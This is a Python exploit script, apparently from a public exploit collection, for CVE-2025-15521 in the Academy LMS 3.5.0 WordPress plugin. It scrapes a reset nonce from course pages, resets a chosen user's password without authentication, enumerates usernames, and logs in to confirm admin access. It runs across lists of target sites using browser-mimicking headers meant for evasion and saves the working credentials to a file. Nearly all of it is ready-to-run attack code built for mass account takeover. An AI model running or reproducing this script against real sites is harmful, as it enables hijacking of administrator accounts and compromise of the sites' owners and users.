5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-15521.py PY
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
RT.py
By: Nxploited (Khaled Alenazi)
GitHub: https://github.com/Nxploited
Telegram: @KNxploited

Description
===========
Silent, high-signal assistant for abusing the insecure reset flow in Academy LMS 3.5.0.

Behavior (per target)
---------------------
1) Normalize WordPress base (supports subdirectory installs).
2) Locate a valid reset key (academy_nonce) from course-related pages.
3) Trigger the vulnerable reset handler for a chosen user_id using a single password.
4) Enumerate candidate accounts (author & REST based).
5) Attempt strict login for each candidate with that password:
     - Reject on known login failure messages.
     - Require wordpress_logged_in cookie.
     - Require real access to /wp-admin pages with admin UI markers.
6) For each strictly verified login, append a line to the result file.

Console philosophy
------------------
- No usernames, no passwords, no key values printed.
- Each target gets a single compact status line:
      [TIME] [HOST] KEY: OK | RESET: OK | ACCESS: 2 HIT
- Color-coded and ordered output, no noisy tracebacks or SSL warnings.
"""

import os
import re
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import Optional, List, Set, Tuple
from urllib.parse import urlparse

import requests
import urllib3

try:
    from colorama import Fore, Style, init as colorama_init  # type: ignore
    colorama_init(autoreset=True)
except Exception:
    class _C:
        RESET = ""
        RED = ""
        GREEN = ""
        YELLOW = ""
        CYAN = ""
        MAGENTA = ""
        BLUE = ""
        WHITE = ""
    Fore = _C()
    Style = _C()

# Silent SSL / warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()

# --------------------------------------------------------
# Banner & UI
# --------------------------------------------------------

BANNER_LINES = [
    "                                                                     ",
    " _____ _____ _____     ___ ___ ___ ___     ___   ___ ___ ___ ___   ",
    "|     |  |  |   __|___|_  |   |_  |  _|___|_  | |  _|  _|_  |_  |  ",
    "|   --|  |  |   __|___|  _| | |  _|_  |___|_| |_|_  |_  |  _|_| |_ ",
    r"|_____|\___/|_____|   |___|___|___|___|   |_____|___|___|___|_____|",
    "                                                                     ",
]

AUTHOR_LINE = (
    "By: Nxploited (Khaled Alenazi)  |  GitHub: https://github.com/Nxploited  |  Telegram: @KNxploited"
)


def print_banner() -> None:
    os.system("cls" if os.name == "nt" else "clear")
    for line in BANNER_LINES:
        print(Fore.MAGENTA + line + Style.RESET_ALL)
    print(Fore.CYAN + AUTHOR_LINE + Style.RESET_ALL)
    print()
    print(
        Fore.YELLOW
        + "Academy LMS 3.5.0 - Reset & Access Assistant (minimal, strict, silent)"
        + Style.RESET_ALL
    )
    print(Fore.YELLOW + "-" * 74 + Style.RESET_ALL)
    print()


# --------------------------------------------------------
# Minimal logging
# --------------------------------------------------------

def now_hms() -> str:
    return time.strftime("%H:%M:%S")


def format_site_status(
    base: str,
    key_status: str,
    reset_status: str,
    access_status: str,
    color: str,
) -> None:
    """
    Single aligned status line per site, no sensitive values.
    Example:
      [01:23:45] [https://target.com/wp] KEY: OK   | RESET: OK   | ACCESS: 2 HIT
    """
    line = (
        f"[{now_hms()}] "
        f"[{base}] "
        f"KEY: {key_status:<4} | "
        f"RESET: {reset_status:<4} | "
        f"ACCESS: {access_status}"
    )
    print(color + line + Style.RESET_ALL)


def log_note(msg: str) -> None:
    print(f"[{now_hms()}] {Fore.CYAN}[*]{Style.RESET_ALL} {msg}")


def log_warn(msg: str) -> None:
    print(f"[{now_hms()}] {Fore.YELLOW}[!]{Style.RESET_ALL} {msg}")


def log_err(msg: str) -> None:
    print(f"[{now_hms()}] {Fore.RED}[x]{Style.RESET_ALL} {msg}")


def log_done(msg: str) -> None:
    print(f"[{now_hms()}] {Fore.GREEN}[+]{Style.RESET_ALL} {msg}")


# --------------------------------------------------------
# URL / Session / Headers
# --------------------------------------------------------

def split_wp_base(url: str) -> Tuple[str, str]:
    """
    Split target URL into:
      base_host = scheme://netloc
      wp_base   = installation path (or "" for root)
    """
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "https://" + url
    parsed = urlparse(url)
    base_host = f"{parsed.scheme}://{parsed.netloc}"
    path = parsed.path or "/"
    if path == "/":
        return base_host, ""
    return base_host, path.rstrip("/")


def build_wp_url(base_host: str, wp_base: str, path: str) -> str:
    if not path.startswith("/"):
        path = "/" + path
    full = (wp_base + path).replace("//", "/")
    return base_host + full


def build_session(timeout: int) -> requests.Session:
    """
    Session tuned for low-noise scanning & light evasion.
    """
    s = requests.Session()
    s.verify = False
    s.headers.update({
        "User-Agent": (
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
            "AppleWebKit/537.36 (KHTML, like Gecko) "
            "Chrome/121.0.0.0 Safari/537.36"
        ),
        "Accept": (
            "text/html,application/xhtml+xml,application/xml;q=0.9,"
            "image/avif,image/webp,image/apng,*/*;q=0.8"
        ),
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "none",
        "Sec-Fetch-User": "?1",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
    })
    adapter = requests.adapters.HTTPAdapter(pool_connections=50, pool_maxsize=50, max_retries=1)
    s.mount("http://", adapter)
    s.mount("https://", adapter)
    return s


# --------------------------------------------------------
# Reset key (academy_nonce) extraction
# --------------------------------------------------------

def extract_reset_key(body: str) -> Optional[str]:
    """
    Extract the reset key used by the vulnerable handler (academy_nonce).
    Only matches the specific key, not generic nonces.
    """
    if not body:
        return None

    m = re.search(r'"academy_nonce"\s*:\s*"([^"]+)"', body)
    if m:
        return m.group(1)

    m = re.search(r"'academy_nonce'\s*:\s*'([^']+)'", body)
    if m:
        return m.group(1)

    m = re.search(r'academy_nonce["\']?\s*:\s*["\']([^"\']+)["\']', body)
    if m:
        return m.group(1)

    m = re.search(r'AcademyGlobal\.academy_nonce\s*=\s*["\']([^"\']+)["\']', body)
    if m:
        return m.group(1)

    m = re.search(r'data-academy_nonce=["\']([^"\']+)["\']', body)
    if m:
        return m.group(1)

    m = re.search(r'academy_nonce\s*=\s*["\']([^"\']+)["\']', body)
    if m:
        return m.group(1)

    return None


def find_course_links(body: str, base_host: str, wp_base: str, max_links: int) -> List[str]:
    """
    Extract up to max_links URLs that contain '/course/' from HTML, resolved under WP base.
    """
    links: List[str] = []
    if not body:
        return links

    href_pattern = re.compile(r'href=["\']([^"\']+)["\']', re.I)
    for m in href_pattern.finditer(body):
        href = m.group(1)
        if "/course/" in href:
            if href.startswith(("http://", "https://")):
                url = href
            else:
                url = build_wp_url(base_host, wp_base, href)
            if url not in links:
                links.append(url)
            if len(links) >= max_links:
                break
    return links


def crawl_for_key(
    sess: requests.Session,
    base_host: str,
    wp_base: str,
    course_path: str,
    max_course_pages: int,
    timeout: int,
) -> Tuple[str, Optional[str]]:
    """
    Try to recover a valid reset key (academy_nonce) from course pages.
    Returns:
      (source_url, key or None)
    """
    course_root = build_wp_url(base_host, wp_base, course_path)
    try:
        r = sess.get(course_root, timeout=timeout, allow_redirects=True)
    except Exception:
        return course_root, None

    links = find_course_links(r.text or "", base_host, wp_base, max_course_pages)

    for url in links:
        try:
            r2 = sess.get(url, timeout=timeout, allow_redirects=True)
        except Exception:
            continue
        key = extract_reset_key(r2.text or "")
        if key:
            return url, key

    # Fallback: home
    home_url = build_wp_url(base_host, wp_base, "/")
    try:
        r3 = sess.get(home_url, timeout=timeout, allow_redirects=True)
    except Exception:
        return home_url, None

    key = extract_reset_key(r3.text or "")
    if key:
        return home_url, key

    return course_root, None


# --------------------------------------------------------
# Reset handler interaction
# --------------------------------------------------------

def trigger_reset(
    sess: requests.Session,
    base_host: str,
    wp_base: str,
    reset_path: str,
    key: str,
    new_password: str,
    user_id: int,
    timeout: int,
) -> bool:
    """
    Trigger the vulnerable reset handler with the extracted key.
    This does NOT prove password change; it only confirms that the request reached
    the handler without failing nonce validation.
    """
    reset_url = build_wp_url(base_host, wp_base, reset_path)
    if "?" in reset_url:
        full = f"{reset_url}&user_id={user_id}"
    else:
        full = f"{reset_url}?user_id={user_id}"

    data = {
        "new_password": new_password,
        "confirm_new_password": new_password,
        "security": key,
        "academy_reset_submit": "1",
    }

    try:
        r = sess.post(
            full,
            data=data,
            headers={
                "Content-Type": "application/x-www-form-urlencoded",
                "Referer": full,
            },
            timeout=timeout,
            allow_redirects=True,
        )
    except Exception:
        return False

    if "Security check failed" in (r.text or ""):
        return False

    return True


# --------------------------------------------------------
# Username enumeration (author + REST + guesses)
# --------------------------------------------------------

AUTHOR_PATTERN = re.compile(r"/author/([^/]+)")
AUTHOR_BODY_PATTERNS = [
    re.compile(r'author-\w+">([a-z0-9_\-]+)<', re.I),
    re.compile(r"/author/([a-z0-9_\-]+)/", re.I),
    re.compile(r'"slug":"([a-z0-9_\-]+)"', re.I),
    re.compile(r'"username":"([a-z0-9_\-]+)"', re.I),
]


def enum_by_author(sess: requests.Session, root_url: str, timeout: int, max_i: int = 10) -> Set[str]:
    users: Set[str] = set()
    for i in range(1, max_i + 1):
        try:
            u = f"{root_url}/?author={i}"
            r = sess.get(u, timeout=timeout, allow_redirects=False)
            if r.status_code in (301, 302):
                loc = r.headers.get("location", "") or r.headers.get("Location", "")
                m = AUTHOR_PATTERN.search(loc)
                if m:
                    users.add(m.group(1))
            r2 = sess.get(u, timeout=timeout, allow_redirects=True)
            if r2.status_code == 200 and r2.text:
                body = r2.text
                for patt in AUTHOR_BODY_PATTERNS:
                    for x in patt.findall(body):
                        users.add(x)
        except Exception:
            continue
    return users


def enum_by_rest(sess: requests.Session, root_url: str, timeout: int) -> Set[str]:
    users: Set[str] = set()
    api = root_url.rstrip("/") + "/wp-json/wp/v2/users"
    try:
        r = sess.get(api, timeout=timeout)
    except Exception:
        return users
    if r.status_code != 200:
        return users
    try:
        data = r.json()
    except Exception:
        return users
    if isinstance(data, list):
        for entry in data:
            if isinstance(entry, dict):
                for key in ("slug", "username", "name"):
                    v = entry.get(key)
                    if v:
                        users.add(str(v))
    return users


def collect_candidates(base_host: str, wp_base: str, timeout: int) -> List[str]:
    sess = build_session(timeout)
    root = build_wp_url(base_host, wp_base, "/")

    users: Set[str] = set()
    users.update(enum_by_author(sess, root, timeout, max_i=10))
    users.update(enum_by_rest(sess, root, timeout))

    parsed = urlparse(root)
    host = parsed.netloc.split(":")[0].lower()
    if host.startswith("www."):
        host = host[4:]
    first_label = host.split(".")[0]
    if first_label and len(first_label) > 2:
        users.add(first_label)

    users.add("admin")
    users = {u for u in users if u and 2 < len(u) < 50}

    if not users:
        users = {"admin"}

    return sorted(users)


# --------------------------------------------------------
# Strict admin access verification
# --------------------------------------------------------

def check_admin_access(sess: requests.Session, root_url: str, timeout: int) -> bool:
    """
    Check that the current session reaches /wp-admin pages and sees admin UI markers
    without being redirected to the login page or blocked by permission errors.
    """
    admin_paths = [
        "/wp-admin/index.php",
        "/wp-admin/profile.php",
        "/wp-admin/edit.php",
        "/wp-admin/plugins.php",
        "/wp-admin/users.php",
    ]
    markers = [
        'id="adminmenu"', 'id="wpadminbar"', '<div id="wpwrap">',
        'class="wp-admin', 'id="wpcontent"', 'id="wpbody-content"',
        "users.php", "plugins.php", "edit.php",
    ]
    deny = [
        "sorry, you are not allowed to access this page",
        "you do not have sufficient permissions",
        "insufficient permissions",
    ]

    ok_pages = 0

    for ep in admin_paths:
        u = root_url.rstrip("/") + ep
        try:
            r = sess.get(u, timeout=timeout, allow_redirects=True)
        except Exception:
            continue
        if r.status_code != 200:
            continue
        if "wp-login.php" in (r.url or ""):
            return False
        content = r.text or ""
        low = content.lower()
        if any(d in low for d in deny):
            return False
        found = sum(1 for m in markers if m in content)
        if found >= 3:
            ok_pages += 1
        if ok_pages >= 2:
            return True

    # Fallback: plugin-install
    try:
        r2 = sess.get(root_url.rstrip("/") + "/wp-admin/plugin-install.php",
                      timeout=timeout, allow_redirects=True)
        if r2.status_code == 200:
            low2 = (r2.text or "").lower()
            if any(d in low2 for d in deny):
                return False
            if "upload-plugin" in low2 or "plugin-install-tab" in low2:
                return True
    except Exception:
        pass

    return ok_pages >= 1


# --------------------------------------------------------
# Strict login attempt (no account details printed)
# --------------------------------------------------------

def strict_login_attempt(
    sess: requests.Session,
    base_host: str,
    wp_base: str,
    login_path: str,
    username: str,
    password: str,
    timeout: int,
) -> bool:
    """
    Strict WordPress login:
      - Reject on known failure messages.
      - Require wordpress_logged_in cookie.
      - Require real access to admin UI (check_admin_access).
    """
    root_site = build_wp_url(base_host, wp_base, "/")
    login_url = build_wp_url(base_host, wp_base, login_path)

    try:
        sess.get(login_url, timeout=timeout, allow_redirects=True)
    except Exception:
        pass

    data = {
        "log": username.strip(),
        "pwd": password,
        "wp-submit": "Log In",
        "testcookie": "1",
    }
    headers = {
        "User-Agent": sess.headers.get("User-Agent", ""),
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": login_url,
    }

    try:
        r = sess.post(
            login_url,
            data=data,
            headers=headers,
            timeout=timeout,
            allow_redirects=True,
        )
    except Exception:
        return False

    content = (r.text or "").lower()
    fails = [
        "incorrect username or password",
        "invalid username",
        "invalid password",
        "error: the username",
        "is not registered",
        "authentication failed",
        "login failed",
        "unknown username",
    ]
    if any(x in content for x in fails):
        return False

    has_cookie = any(c.name.startswith("wordpress_logged_in") for c in sess.cookies)
    if not has_cookie:
        return False

    if not check_admin_access(sess, root_site, timeout):
        return False

    return True


def find_wp_login_path(sess: requests.Session, base_host: str, wp_base: str, timeout: int) -> str:
    paths = [
        "/wp-login.php",
        "/wordpress/wp-login.php",
        "/wp/wp-login.php",
        "/blog/wp-login.php",
        "/cms/wp-login.php",
        "/wp/login.php",
    ]
    for p in paths:
        url = build_wp_url(base_host, wp_base, p)
        try:
            r = sess.get(url, timeout=timeout, allow_redirects=True)
        except Exception:
            continue
        txt = r.text or ""
        if r.status_code == 200 and "<form" in txt and "password" in txt.lower():
            return p
    return "/wp-login.php"


def brute_with_single_password(
    base_host: str,
    wp_base: str,
    usernames: List[str],
    password: str,
    timeout: int,
    output_file: str,
) -> int:
    """
    Try strict login for each candidate with the same password.
    Does not print usernames; only counts hits and logs them to file.
    """
    hits = 0
    sess0 = build_session(timeout)
    login_path = find_wp_login_path(sess0, base_host, wp_base, timeout)

    for username in usernames:
        sess_user = build_session(timeout)
        if strict_login_attempt(sess_user, base_host, wp_base, login_path, username, password, timeout):
            ts = time.strftime("%Y-%m-%dT%H:%M:%S")
            line = f"[{ts}] {base_host}{wp_base or ''} - account={username}  pass={password}\n"
            os.makedirs(os.path.dirname(output_file), exist_ok=True)
            with open(output_file, "a", encoding="utf-8") as f:
                f.write(line)
            hits += 1

    return hits


# --------------------------------------------------------
# Per-site orchestration
# --------------------------------------------------------

def process_site(
    site: str,
    reset_path: str,
    course_path: str,
    max_course_pages: int,
    reset_user_id: int,
    new_pass: str,
    timeout: int,
    output_file: str,
) -> None:
    base_host, wp_base = split_wp_base(site)
    label = f"{base_host}{wp_base or ''}"

    key_status = "-"
    reset_status = "-"
    access_status = "0 HIT"

    sess = build_session(timeout)

    # Step 1: extract reset key
    _, key = crawl_for_key(sess, base_host, wp_base, course_path, max_course_pages, timeout)
    if key:
        key_status = "OK"
    else:
        key_status = "FAIL"
        format_site_status(label, key_status, reset_status, access_status, Fore.RED)
        return

    # Step 2: trigger reset
    if trigger_reset(sess, base_host, wp_base, reset_path, key, new_pass, reset_user_id, timeout):
        reset_status = "OK"
    else:
        reset_status = "FAIL"
        format_site_status(label, key_status, reset_status, access_status, Fore.RED)
        return

    # Step 3: enumerate candidates + brute
    usernames = collect_candidates(base_host, wp_base, timeout)
    hits = brute_with_single_password(
        base_host,
        wp_base,
        usernames,
        new_pass,
        timeout,
        output_file,
    )
    access_status = f"{hits} HIT"

    color = Fore.GREEN if hits > 0 else Fore.YELLOW
    format_site_status(label, key_status, reset_status, access_status, color)


# --------------------------------------------------------
# Interactive runner
# --------------------------------------------------------

def ask(prompt: str, default: Optional[str] = None) -> str:
    if default is not None:
        s = input(f"{prompt} [{default}]: ").strip()
        return s if s else default
    return input(f"{prompt}: ").strip()


def ask_int(prompt: str, default: int) -> int:
    s = ask(prompt, str(default))
    try:
        return int(s)
    except Exception:
        return default


def run_interactive() -> None:
    print_banner()

    url_list_file = ask("Targets list file (one URL per line)")
    if not os.path.exists(url_list_file):
        log_err(f"Targets file not found: {url_list_file}")
        sys.exit(1)

    threads = ask_int("Threads (concurrent sites)", 5)
    reset_path = ask("Reset handler path", "/academy-retrieve-password/")
    course_path = ask("Course root path (key source)", "/course/")
    max_course_pages = ask_int("Max /course/ subpages to scan per site", 15)
    reset_user_id = ask_int("user_id to reset (handler target)", 1)
    new_pass = ask("New password to set (for reset + access)", "adminSA")
    timeout = ask_int("HTTP timeout (seconds)", 10)
    output_file = ask("Output file for strictly verified access", "scan_results/academy_access_success.txt")

    targets: List[str] = []
    with open(url_list_file, "r", encoding="utf-8", errors="ignore") as f:
        for line in f:
            line = line.strip()
            if line:
                targets.append(line)

    if not targets:
        log_err("Targets file is empty.")
        sys.exit(1)

    log_note(f"Loaded {len(targets)} targets.")
    log_note("Process: KEY extraction -> reset attempt -> strict access checks.")
    print()

    start = time.time()
    with ThreadPoolExecutor(max_workers=threads) as executor:
        futures = {
            executor.submit(
                process_site,
                site,
                reset_path,
                course_path,
                max_course_pages,
                reset_user_id,
                new_pass,
                timeout,
                output_file,
            ): site
            for site in targets
        }

        try:
            for future in as_completed(futures):
                _ = futures[future]
        except KeyboardInterrupt:
            log_warn("Interrupted by user, shutting down threads...")
            executor.shutdown(wait=False, cancel_futures=True)
            sys.exit(1)

    elapsed = time.time() - start
    print()
    log_done(f"Finished in {elapsed:.2f}s")
    log_done(f"Strictly verified access entries written to: {output_file}")


if __name__ == "__main__":
    run_interactive()